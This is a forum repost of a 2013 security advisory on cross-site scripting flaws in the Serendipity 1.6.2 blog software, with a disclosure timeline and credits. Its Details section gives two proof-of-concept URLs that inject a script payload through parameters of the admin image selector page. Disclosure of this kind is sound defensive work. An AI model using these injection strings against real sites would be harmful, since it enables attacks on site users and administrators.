Matt Posted July 12, 2013 Report Posted July 12, 2013 Description : Serendipity version 1.6.2 suffers from multiple cross site scripting vulnerabilitiesAuthor : Omar KurtSource : Serendipity 1.6.2 Cross Site Scripting ? Packet StormCode : Information--------------------Name : XSS Vulnerabilities in SerendipitySoftware : Serendipity 1.6.2 and possibly below.Vendor Homepage : http://www.s9y.org/Vulnerability Type : Cross-Site ScriptingSeverity : MediumResearcher : Omar KurtAdvisory Reference : NS-13-003Description--------------------Serendipity is a PHP-powered weblog application which gives the user aneasy way to maintain an online diary, weblog or even a complete homepage.While the default package is designed for the casual blogger, Serendipityoffers a flexible, expandable and easy-to-use framework with the power forprofessional applications.Details--------------------Serendipity is affected by XSS vulnerabilities in version 1.6.2.http://example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117You can read the full article about Cross-Site Scripting from here :http://www.mavitunasecurity.com/crosssite-scripting-xss/Solution--------------------The vendor fixed this vulnerability in the new version. Please see thereferences.Advisory Timeline--------------------26/02/2013 - First contact04/03/2013 - Sent the details10/07/2013 - Advisory releasedCredits--------------------It has been discovered on testing of Netsparker, Web Application SecurityScanner - http://www.mavitunasecurity.com/netsparker/.References--------------------Vendor Url / Patch : -MSL Advisory Link :https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity/Netsparker Advisories :http://www.mavitunasecurity.com/netsparker-advisories/About Netsparker--------------------Netsparker® can find and report security issues such as SQL Injection andCross-site Scripting (XSS) in all web applications regardless of theplatform and the technology they are built on. Netsparker's uniquedetection and exploitation techniques allows it to be dead accurate inreporting hence it's the first and the only False Positive Free webapplication security scanner.-- Netsparker Advisories, <advisories@mavitunasecurity.com>Homepage, http://www.mavitunasecurity.com/netsparker-advisories/ Quote